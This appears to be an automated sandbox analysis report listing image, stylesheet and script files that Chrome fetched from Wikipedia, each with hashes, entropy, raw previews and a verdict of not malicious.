                                        Preview:.PNG........IHDR..............W.?....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE............................................................................................................````cg]bdTZ\SX]TY^TZ^UY]SX]TY]TY]UZ^...knoTY]mqulpt........................kos...jnr.........inq...............0tRNS..u...t(..'.......|.......-XZ,?@A...wnm.~7..6........bKGD6G.......tIME.....8.........IDAT..e....0.E...{.(...`..f..Or&Q._r.z.!,!...TZ .2Y.r...E.$Ie.R......4[@.o..z|.1..p............ ....Y.i...........z...t...k.o..c..,;.~...y.....^.|.Xo......:l.-!_.,0U.3!....%tEXtdate:create.2024-06-12T19:56:02+00:00<.6s...%tEXtdate:modify.2024-06-12T19:56:02+00:00M.......IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (7407), with no line terminators
                                        Category:downloaded
                                        Size (bytes):7407
                                        Entropy (8bit):5.105650984588021
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7A850FCB8C66471BF3209410027C46FA
                                        SHA1:C0629A4F4977FB2CDFEDCF4FEB2D68CB929332F8
                                        SHA-256:502DC6C5BE8ACDCE1554D427354E7ABEB3435D06BDE37B530407332748466778
                                        SHA-512:BBC46828B09EB27CD00DF95F51D2B12A0FDA79D69C0A4302D7732AD32B94BC867F7E7BF15E8EBA981CC482C8617DDEED9A47B68E1F2A59E656A042908D77C59D
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/w/load.php?lang=en&modules=site.styles&only=styles&skin=vector-2022
                                        Preview:cite,dfn{font-style:inherit}q{quotes:'"' '"' "'" "'"}blockquote{overflow:hidden;margin:1em 0;padding:0 40px}small{font-size:85%}.mw-body-content sub,.mw-body-content sup{font-size:80%}.ns-talk .mw-body-content dd{margin-top:0.4em;margin-bottom:0.4em}.client-js .collapsible:not(.mw-made-collapsible).collapsed > tbody > tr:not(:first-child),.client-js .outercollapse .innercollapse.mw-collapsible:not(.mw-made-collapsible) > p,.client-js .outercollapse .innercollapse.mw-collapsible:not(.mw-made-collapsible) > table,.client-js .outercollapse .innercollapse.mw-collapsible:not(.mw-made-collapsible) > thead + tbody,.client-js .outercollapse .innercollapse.mw-collapsible:not(.mw-made-collapsible) tr:not(:first-child),.client-js .outercollapse .innercollapse.mw-collapsible:not(.mw-made-collapsible) .mw-collapsible-content,#editpage-specialchars{display:none}.references{margin-bottom:0.5em}span[rel="mw:referencedBy"]{counter-reset:mw-ref-linkback 0}span[rel='mw:referencedBy'] > a::before{content:
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 19 x 19, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):1353
                                        Entropy (8bit):7.58237264208611
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5831737F85F43B4522DD1461A806BA08
                                        SHA1:2785586964B665DA2E305815EA7163C5239C0BC0
                                        SHA-256:DA4E514488AF1150D193757C2A46629A4D1B63313D2E8A09E25EADADEBE98228
                                        SHA-512:909DFA740D60A8CEDDB87F62500AA2B9846AB8AAE08F6F9BA0F34F75248CD79C8DDA43DEED6DD9FAAB0051C23A94C2A5D8AE2224A87568C2E85D9E5949108495
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR.............E.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE...........................................................................................................................................................................................bbb............................................5.........................B..&.+..........E..J..l.............e.......%A9...{.?..G..K..P..L....<...........!.(xV**)(HHH...XWT..4..I..8..F.......h..&.....$..(.+.](2+..5..>..A..."..V..s.....}..O..$..*../..2..7..;.$......j....t.....v..j..\..=..&..,..1..3..................u..m..a..V..K..?.....*..,.....................^..d..Y..M..B..7..+.. ......................W..[..P..D..9.....".............. ..f..R..G..;..0..%................./....$Y#....bKGD.5..T....tIME.......?. C...sIDAT..c``dbfaec............A!a.Q1q.I)i.Y9y.....X.......X)............$...Cy.#c..E...<.\R..@..L..-@JY.$.x..AJ.,..ml5..e...x..v18:9.....*.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):106
                                        Entropy (8bit):5.906282870319786
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:24A16E15784BE868DABD21E44A66EA5D
                                        SHA1:28BB097CB8AB8EDE0614594485EDBBC432D9566E
                                        SHA-256:D49A4546C340AE42A7596B754FB04C5EFCC35F4BBDFB3FEF6FA7876A145814D6
                                        SHA-512:E09A45FA03ADCFEE294FCCB61DBF16F50358CF7255DA69EC01BA06076E85D5BA902E427A7E87DD55AA6D00516127B5E9D5DEFC1D735A6BCE46918DC09794E02B
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/f/f3/Flag_of_Switzerland.svg/19px-Flag_of_Switzerland.svg.png
                                        Preview:RIFFb...WEBPVP8LU.../..../@$@B.Q.........9a..... ."f.$(.$.Y.5...I .|.?M~...........f7.....{4.....S..8....
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):618
                                        Entropy (8bit):7.542091910330175
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7ED85C56CFA5A7542ECC2962A03FA5D5
                                        SHA1:28C1AE75C93BB3C53A8EB9E4204B79D744747AFB
                                        SHA-256:A488CBCF598B8AEFBF2014C6C117B20327DD83D4AD44FD0AB0A224B775A414A1
                                        SHA-512:2D00C2E1A48249A496E1AAE6FA6DBBA0878D5F076687D6AEFF90FCADAB30BAB19D6E32AC2F6D247C88CD73B54069216E05DC48E2DFC3DA8E9DC50598224812B1
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/en/thumb/0/01/A_coloured_voting_box.svg/19px-A_coloured_voting_box.svg.png
                                        Preview:RIFFb...WEBPVP8LU.../.....T ....2D...5.e..{$.[..n.F. 1.o....D......>..~./+.7T..-......S.I....HD*t.t.g ..pm.6....m........T........{Ba.6H;.?N ..0.........b).@..Z..IZ..$.....0.P!A5....@.(.0$...W....Y.;....`.v .....U.H.Y.Oa.:a.....?..6..NW....`.....C.:.w..$Pp.T.1...}..y5..^x...6.9.ET[..;gb..@.......`...g..Q.n.9.?D..^.H..d...OjA=..X.r....'......V...#.p..o....*.:.].............7.X............{.gKW..[\..n......z.n..6.......bQQ..0.1.5YX[./........(V...a*E:5...E..o.kU........Q#"1A...^...*B..O.]|,l_u....%.G.v.JTV$.......rK(B..f..mg..;kr....W+*....^.....3c......'.W.5F..$?.\........."M(K2Fb....1..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JPEG image data, baseline, precision 8, 220x279, components 3
                                        Category:dropped
                                        Size (bytes):29522
                                        Entropy (8bit):7.96912809430174
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:4DFB585111A8DFD98427B3CDE07D38E8
                                        SHA1:DAF84340C60568A8C6621718D37974F521CFA721
                                        SHA-256:8AE98FA2BFDDE792C4893CE898C686FF16C870D8FB1121A5A24F3759D169617D
                                        SHA-512:DD4A8B5C5F751D52EF5EF2C5834E930199A38281F010D706728970E58FB6ACBAFCD32943CB3E04DC99C4122B12B31FB0EB60470771279D2C7F189E8563B686A0
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.....C....................................................................C............................................................................"........................................N..........................!1.A.."Q2aq.#...3BR...$%Cb..4r.....&Sc...'67DUs..................................H........................!.1AQaq...".....BR...#2r...$b....3CSs..4..................?..-..[..K<..F....jX.......5..+....'...?n.K...{..W#..'?.gG.3.2.1.-*u(..h'..h....J.......~.....m-U..b.D_.?xH........r..O.h.4."..I.'L..`w.<....o6.N...c....kQ..Z.S#.....A.....JJ.....y......=.....RW[.dGAp..`3........s....k..+...T...e.D...+#...h.......#.E|...u."U.@.3...I..)...F.......GpWmG.(.&...t.4I].a.n2.O../.. ...Z.....+..3.D,3K......p..y.y2.J*.N1..M..wR....'...o...vm....$...~.y.....oN................2'.Hx...$....Z)...!S.?.....#.5......kT..%.....U=Sr..T......#...7.fF_....s.O....0.1...~.I..cLvj*q+.O$.+L...!....=~d~.}.....&.PiU.|).,g.{.a..*..~.5..5e.L..n...Z.s.@.9...W%.:y[.Z).8...?l...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JPEG image data, baseline, precision 8, 250x167, components 3
                                        Category:dropped
                                        Size (bytes):18928
                                        Entropy (8bit):7.957499255326409
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8AA011377255964DDDA2A3064FA4F69C
                                        SHA1:952BD6408A3607935C7100CB5A94A258E53C713A
                                        SHA-256:5BE80FEF646DFBBB094B37114E30ADA4FF35DCEACBF87150B9C2DD01785E95DA
                                        SHA-512:DE2FBD21E73100D6191A609F95E4F304CB9F9023F2DFB16F152C7A537A33AC56CEFF7E0DD4F8032409C5B76F7E8B4FDEDD74A40A77CFE4F313F42E26CEB1D63D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.....C....................................................................C............................................................................".......................................?........................!.1.."AQ2a..#q.B.$3..4R...%b....5Cr...............................).....................!.1A.Qa.."q..................?.......Y.....3.K.u..4./.......D%=.............Y.....*}?9.r...F..#..(.c,.y..4:...z...2.ia\M1#....Xn......9.L:4.y..~$........FVH......dig.u..J....~=s7.@Xb.v.X..\.+{I'.....i....6O.+I<L...'p.9.......(7Jc..&$.".....H$.....=;6...<.....uHa..R0.r.L...|...-4.I...a9..|)$mG.i.c@....{{t..xWL.....r..../..X.@.Gp>./.A.....5.CF.Y1ud.6.......z$...s.FJ.C.I.1.H..."h....V.8..l_z.~.j...U...S9.b.x".D.VHD.P.#..{q.T0.VUM.K9{.$<W~}..=s...&...I.VX...D-$d..J.(.....tA=#.g.B..4.hc...R..n....(.....F.K ..s..U.,v..U.f....5v....:...o.).kh..1-C.I....R..g1..R.#.i.Yl...B{]q@W........bl... ...^w2nNI#.,U.=.......~!..!...S.V..\25..>...g...d.....-....y.......ty.#..d.'l..L...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):221
                                        Entropy (8bit):5.140712389287767
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F4C86D1899E1F6ECA69D3CE4DC961304
                                        SHA1:36196FFCC258E966E2C9F4D06D80733C48BD40DE
                                        SHA-256:4DE5F25341A457E9FBCF7C29C44158D94CE7F74E91F92AE30B03FE7606716D08
                                        SHA-512:D55B1F67FE20CD134B3B4A409BE2C86DF24647647334B2F4566AB08C8C7E3D04EFB12AB606EF7AB88A128DA48D90013279562249F5085A085EBB39E72298EB3B
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=menu&format=original&lang=en&skin=vector-2022&version=1qdch
                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>...menu..</title><g fill="#000"><path d="M1 3v2h18V3zm0 8h18V9H1zm0 6h18v-2H1z"/></g></svg>.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):298
                                        Entropy (8bit):5.1399561245747964
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:FB64DF7CFCBD9D16F4812087ABCC8DD4
                                        SHA1:22B95BF281ABF89524229E7FD89666B84FF3D1CD
                                        SHA-256:B324430A72A978FFC29853C1DBB95679833C58B30E5B5D10E5063F96F98C5BA2
                                        SHA-512:77C7F0AAD4DB6047A46595BB08108F09BC9216FB4A3E810BC0CE73D8DF69C9A4FCCEFD33EEB38736C1CD32FF8B1B58E4DA293CAA07BF99C3EDD0F972B02D3013
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12">..<title>...external link..</title>..<path fill="#36c" d="M6 1h5v5L8.86 3.85 4.7 8 4 7.3l4.15-4.16zM2 3h2v1H2v6h6V8h1v2a1 1 0 0 1-1 1H2a1 1 0 0 1-1-1V4a1 1 0 0 1 1-1"/>.</svg>.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (1136)
                                        Category:downloaded
                                        Size (bytes):828615
                                        Entropy (8bit):5.530889016966538
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:5FC78F0B1EF28C829BA948396A516974
                                        SHA1:EE4B7A79D84C7E6C01914157A4E960CFDF12A8E7
                                        SHA-256:8690BFBD89FE20499BC37D662829032AB7BCF33F76FB9B729A7E687048DCA3E6
                                        SHA-512:F231E4E7B8F2E55B2EF1CD68930F56384561634A57F05B58E385171786089819CFFEAA61EE5E45C045081BCFB0BBA5C22B0C7C9FA87E7ED896E912C06A9BF9F1
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/w/load.php?lang=en&modules=ext.centralNotice.bannerHistoryLogger%2CchoiceData%2Cdisplay%2CgeoIP%2CimpressionDiet%2CkvStore%2ClargeBannerLimit%2ClegacySupport%2CstartUp%7Cext.centralauth.ForeignApi%2Ccentralautologin%7Cext.checkUser.clientHints%7Cext.cite.ux-enhancements%7Cext.cx.eventlogging.campaigns%7Cext.cx.model%7Cext.cx.uls.quick.actions%7Cext.echo.centralauth%7Cext.eventLogging%2CnavigationTiming%2Cpopups%2CwikimediaEvents%7Cext.growthExperiments.SuggestedEditSession%7Cext.scribunto.logs%7Cext.uls.common%2Cinterface%2Cpreferences%2Cwebfonts%7Cext.urlShortener.toolbar%7Cjquery%2Coojs%2Csite%7Cjquery.client%2CmakeCollapsible%2CtextSelection%7Cjquery.uls.data%7Cmediawiki.ForeignApi%2CString%2CTitle%2CUri%2Capi%2Cbase%2Ccldr%2Ccookie%2Cexperiments%2CjqueryMsg%2Clanguage%2Crouter%2Cstorage%2Ctoc%2Cuser%2Cutil%2CvisibleTimeout%7Cmediawiki.ForeignApi.core%7Cmediawiki.editfont.styles%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.media%2Cready%7Cmediawiki.page.watch.ajax%7Cmmv.bootstrap%2Ccodex%2Chead%7Cmmv.bootstrap.autostart%7Cmw.cx.SiteMapper%7Coojs-ui.styles.icons-interactions%7Cskins.vector.clientPreferences%2Cjs%7Cskins.vector.icons.js%7Cwikibase.client.vector-2022%7Cwikibase.sidebar.tracking&skin=vector-2022&version=daalv
                                        Preview:mw.loader.impl(function(){return["ext.centralNotice.bannerHistoryLogger@1pcho",function($,jQuery,require,module){(function(){var cn=mw.centralNotice,bhLogger,mixin=new cn.Mixin('bannerHistoryLogger'),doNotTrackEnabled=/1|yes/.test(navigator.doNotTrack)||window.doNotTrack==='1',waitLogNoSendBeacon,now=Math.round(Date.now()/1000),log,readyToLogDeferredObj=$.Deferred(),logSent=false,alreadyRun=false,inSample,BANNER_HISTORY_KV_STORE_KEY='banner_history',BANNER_HISTORY_KV_STORE_TTL=365,BANNER_HISTORY_LOG_ENTRY_VERSION=1,EVENT_LOGGING_SCHEMA='CentralNoticeBannerHistory',TIMESTAMP_RANDOM_SHIFT_MAX=60;function loadLog(){log=cn.kvStore.getItem(BANNER_HISTORY_KV_STORE_KEY,cn.kvStore.contexts.GLOBAL);if(!log){log=[];}}function makeLogEntry(){var data=cn.data,randomTimeShift=Math.round(Math.random()*TIMESTAMP_RANDOM_SHIFT_MAX)-(TIMESTAMP_RANDOM_SHIFT_MAX/2),time=now+randomTimeShift,logEntry={version:BANNER_HISTORY_LOG_ENTRY_VERSION,language:data.uselang,country:data.country,isAnon:data.anonymous,c
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):376
                                        Entropy (8bit):7.30467434053143
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:42ACE422CFEE7906889929C1B3BA2FB3
                                        SHA1:523C22D538CDEEBA66A553B1B7A171AE25D1CB1E
                                        SHA-256:D584089F67BCCDD7355FD107AEE9A26FAD88792F1C0E00CAA2A28C8D7190EE9D
                                        SHA-512:E00D36C33714EF334EA9A0C4008329321BF7AA7855B8EA3B4F49BCADB0A5A418BB2B76D06FF342B295C1DF5EC384D40730A1E2171FE626CDDA7EC68F35DEFD52
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/en/thumb/4/4a/Commons-logo.svg/12px-Commons-logo.svg.png
                                        Preview:RIFFp...WEBPVP8Ld.../......(.$E9s...._ ...$I.o0P#p.Gb7.F....1.....G$-.?..$)...1...r..3I./.........;.W8..:F>..z.m..x.....F..%|(0...y..C..O... ...p4.4D$:-....D.. @.....+....~p...@....8....BG.Ed..R..../....C...\o8.......!..].......m.%......'|.T..6...K.... .Z.........'.h~.............qL.}g1.uwkO..mWO).....4...e..<.Lj..pj...2..UVmA.%....>.y..iWS.Z.@..EJ.......
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):2766
                                        Entropy (8bit):7.9052043196146755
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:2E8F01264DA82A680785DA44D8A9A0D8
                                        SHA1:71B459B2F95E11CEBA1CF07C09EC1D193E2DAA01
                                        SHA-256:5FE6AE2DD6162B8948BB4C5BBE8D263158AC02385F37C55F2F55FC7E62EFD77E
                                        SHA-512:24BF26F9066B8897993205F3C6DF19431E105DE71F50B6F25A6A6C978606DB823F22E1DADFD4D893A20D134ACEE97D274671B2DDA8707331A4B1A1AF13F00283
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/d/d3/HumanRightsLogo.svg/75px-HumanRightsLogo.svg.png
                                        Preview:RIFF....WEBPVP8L..../J......$I........!.....<..].o...#.........m}..$.....m$9.O.W...\\.....cr....@...E..&.r].....?nO.;'D.?..l..Iv...0.KL...,...3.f.>..p...R.,.yg.7..{.v.x.9.....O....{../V..u.ru.R.....D!V.AY.m...Xk_.m....[..[..`.x.yT{...kv..m.n......m.k.m...m.m....$.k.L.._.g.|`..!H:.98g...AK..5.{..p.S.f...a...@.kW3....f...d..Mh;A2.^C.i...$s.0g....P2Y.d9._(...>......._m....7.`B..$...U].Y.=..Zr6...x8Ih3.B.T......wh.z..6..xt|.~.........a.(.Wk..P......~.j...L....Qm#..|....'5|8_6i.4.0...R..nyG.c...)x..............S.....l.....v..d..U.!..W.#..g..B..S....y...$i....WU.xf...3( 0.;....%..nC...U..9.....$.@......)..q}.s...u.x..BB.I..[}.=`..-.4R.2.Y.4.l....U/_....8.4d...c...Ja4.Y.f..$...e....eb.A/...1.h..[. .[.M.:....7. ../.x."z<9..,...........-.d..V.'..h2..s_Gt.....MH4...!.4}Bo0......A......%..-..SQ..0.?....`<..l....Wb=..b}k..E.e..1^..5C.x..X.....}..S..9....b|1bO...;...........6..3kK......B...:y..q..m.GY(Z..C.....';.c.!a..N>m...O\.raq...J...)....";..`.{?%
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JPEG image data, baseline, precision 8, 16x16, components 3
                                        Category:dropped
                                        Size (bytes):1002
                                        Entropy (8bit):5.28587838768263
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:890A2EA205F32692D3CD2D75C5CD4C91
                                        SHA1:DAB4C7F37F927979EECE82DAA95F9A899301E026
                                        SHA-256:F647E8966F414790E8DAE90E19E00849617F8D745C844FBC07E4A1FC35EE4978
                                        SHA-512:539BFBAEC599A6879FB359DFC0F6229942BC59AFB9FE82E2B71286C540FCAA14C3903EFEB1EF22E383248208CCB295D1FBF15ABC99C8BFF376A5009C4D754AA8
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C....................................................................C............................................................................".................................#..............................!1".................................................Q............?.....juZ.9..zl.60..T./.h...W...W.G,...x^....][W........r.X.l<p..>.c.....<.7..A.R..ugA.....Z....o....<+,!<`..*y.1..v..;.ws(...m.+m....v...C.2h0...&''.....RQUA*.%.=\R.5.r.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JPEG image data, baseline, precision 8, 220x173, components 1
                                        Category:dropped
                                        Size (bytes):10292
                                        Entropy (8bit):7.960876696984742
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3533E02BAF24543D2AFC07C50882135E
                                        SHA1:962BC756792D23FC0C160828F83F5AAE2003ECC9
                                        SHA-256:48193AED75159F81985BDF25447C59D5DB07B3B4964D9D0EF9FF6A1D7DBC7AAC
                                        SHA-512:DFF18F3751CA7F3087C473211ADF4159CEF2EEAC84720B4AB609C12C4D5C03848C3D71FB15006B7E920F437D44DECFB626103F0A86D3B50774097CE5A53DD223
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.....C............................................................................"...................................C.........................!1.A."Qa.q.2BRr....#b...$34c......CS.D..........?..k(..`.K_}..Ho...).np..v..j...+8...7k..&n@.1.T.....af.6.........T.(..n1Q.Pi$....5.G....e....YM....%$..4.....RA.....bi..cs.|.aJ.E"...w...![...s.i..3o....H../}...tc.Y.M...C.M.......2...;...........Q1..F....=..1..........6'...PM. ..woO\7.K.}....J@..=.....U...............s..*...8\......v`7_....O<.7.....S....#.'..{z...BA..l@VI.".b..K.*Y.....73r...so\R...z.K.....cz:.;...!.k.....F.....#X.u...iI.<./Ol...-}..8.6....1.>.Cq...N...G..5L|...7q.t......oN7.R...7.1...#..^.C.....rl.l ..-..vi.P..ufe.N....4...*(.....|H..:.W..%..2p.%2R...5..I;....';..;..y?..TW..=...rY..=.o...Zu.'S.=WC.US.ZW......c{.:..p..1.?..i..8.....r.M@4...L..I.;cx.>..:.e.....0.E5..I....[.....v.78e?..EU..q.X.{..T..X....<...|S3A}C.b..y....(.....[...o.?............L......p.0..k..q.Q......u.A.....a.m.Oe.\...?<
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):1240
                                        Entropy (8bit):7.773889227539989
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:31D5C8FF43E0DFA8251BEFE3B5B5C7E9
                                        SHA1:375580AC164115ADCB73AB11343F16E8AF9AFCA3
                                        SHA-256:B2CD8418B4A1B5918C9760AA4538B62CF4AEEF0D4B65E6F54752238E1DABF4CB
                                        SHA-512:66FB3A88C1C87846F30F0F0C465C23E575605A3492477DF14CCB7C885EC03D3A6B9148B1DEDBC010B6C4C37FE8193BE173901171A9FF05B30AE6BBB7E9DE66C3
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/9/99/Wiktionary-logo-en-v2.svg/40px-Wiktionary-logo-en-v2.svg.png
                                        Preview:RIFF....WEBPVP8L..../'....9.m..2...#.k>..B./!..U... M.U....{.m...J.$I.dm..3..0.tO.0....I...`...m.m.m.m.m#.M@..K.C`..>Y.......a|.}......c#vp..E..z 1B.":..V.R.d;M........$.......U.*).*~c.j..?.>...1.."%X....ot.P?....1#..Y.....!S.B..$bxr|EV..\G.).Y.19.L.Kd{..H.I7.xBB..E...T#..M0.T....E@..[..X...Y.3...@T..L.$........%.;.....&.S............&..H...ra.;..`.hLf..r...V..H....P..>...$<...[HOn.B.r.e.'.#.%.BMc..b............n..7......J....i....80....W....51'y...?.....m.&:.m....sQ....:.........zG..8U..a.....8.d.`.jl..-.[....d....C.U.TN..6..o.!.2r..k.......{....@...........93Xd..1.@..q.....hk......9M..O..+.`..'..[...\.Bl9F.K....(t..+.R....Re~.P.p...xe.%.8..{k...=;..!.]!_.X...}6.z...$7....d7R.q......r.0O...ke....i.:..s.7.hp}endI..'b...J.e:`p1]#..=...D..'.Q.......,.D...7.g..e."en}U1....J.^.o.....w...MoH....Y.s.........d;...}...\..=.e.:H.`..*[.q..1pf....p.L...0`.M..ssC!..O.d.&n..t..D...u....._...h.E.Q%<....._.#J..$....A.KE{.F..As.9Y...I.&$..#..PW..".'..q..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):704
                                        Entropy (8bit):4.690707101256654
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BC8FC77B826EC97DF462E51C63A003A9
                                        SHA1:D5574779AF087BEDD38D985E0C5FC9FC35EA49E8
                                        SHA-256:11FF898D3A99CE9B2FE1E0C746ABDB89B50F8DA5A5597023ABE54AC1278A428E
                                        SHA-512:5602B266BAD8E7AF502EDB2E4EBB5284AF0CD8355E46ECB1130F3FACF0C4528F1A1FBF227F47C05131D7C93A054BA2D8440C47FE888D07F492E76E28FA71EDB5
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>...language..</title><g fill="#36c"><path d="M20 18h-1.44a.6.6 0 0 1-.4-.12.8.8 0 0 1-.23-.31L17 15h-5l-1 2.54a.8.8 0 0 1-.22.3.6.6 0 0 1-.4.14H9l4.55-11.47h1.89zm-3.53-4.31L14.89 9.5a12 12 0 0 1-.39-1.24q-.09.37-.19.69l-.19.56-1.58 4.19zm-6.3-1.58a13.4 13.4 0 0 1-2.91-1.41 11.46 11.46 0 0 0 2.81-5.37H12V4H7.31a4 4 0 0 0-.2-.56C6.87 2.79 6.6 2 6.6 2l-1.47.5s.4.89.6 1.5H0v1.33h2.15A11.23 11.23 0 0 0 5 10.7a17.2 17.2 0 0 1-5 2.1q.56.82.87 1.38a23.3 23.3 0 0 0 5.22-2.51 15.6 15.6 0 0 0 3.56 1.77zM3.63 5.33h4.91a8.1 8.1 0 0 1-2.45 4.45 9.1 9.1 0 0 1-2.46-4.45"/></g></svg>.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JPEG image data, baseline, precision 8, 220x147, components 3
                                        Category:dropped
                                        Size (bytes):16567
                                        Entropy (8bit):7.959921064110664
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:809499D62B01E58EF938DA852E7354D0
                                        SHA1:D7D95CDA11EA557AA5E5536278D0EBE709A13F2B
                                        SHA-256:0DF99AF244C76A17B11147496236E6278777C09F1BA24B0B5AC5CF56EBD916B5
                                        SHA-512:7E300CDA24217379D68DDDC6B003871A14E9CF335727FA7EEF8CB9F4DDC62C5E48F6920CFE8143F42A10B89F06B5A702BD4C06BDE124D36BC10A4649A68E5181
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.....C....................................................................C............................................................................".........................................J.........................!..."1A.2Qa#q.....BRb....$3......4Scr...CT.....................................1......................!.1A.Qaq.."......2....BR.............?...U;w.....0.... ..B.C.$.-.z.?C..m..X*pNL.....z..<..p=;.&u.r.$A..A.........q.i:..j.j...is.u.nX$....c.nb6..p=z....{^...a.Rjjh.CY[....S".aIY...`.".......Ck....c..2[f.]Ey......?n....TK+.......^.=..t..W.4qw.5S..!.j+.T....*..........S._.....C.0d3Qe.r@[..(..R.0....n>.4.~...x.M.GM.......p..}..o.22..9.'.A.....X.*.i..I..[R...V....q.XD..;..D.....&.2d..#+..9<.})..<Jx;..WA5%D%.St.EQMP.o....2.......2:.F.1.4,....Q. ..O.02.......W...h.i%M..[..L{...u....P.....z..H...vwX.e.K.c.....c.S.z..6.Ge..0r[.;...UJ.5..s.....K...5A].B..N.z.nh..H.#,l7.y..>.s....m+x..kp..;$........63.......(j....j...w....z...Ul(...(D..d.\d./...Y
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 16 x 17, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):1009
                                        Entropy (8bit):6.9993339263387435
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:09C1E368370F7D93B518267CB66DE7EE
                                        SHA1:D27A32FEE97DCC3181F01646C6999921D8272975
                                        SHA-256:CFC4D901F812DA5985BC6A7421BFE57701CF7B52CD283678CF87F0A838EE32FD
                                        SHA-512:03E5FAD608BA4EA02F2C271BB0956592FCF5F2C9EEE8DC3B8285CF99E4D62E99303D1D3201290171D35F45E52CB8884AB120E81A6ED47A62611A96D5CFB06297
                                        Malicious:false
                                        Reputation:unknown
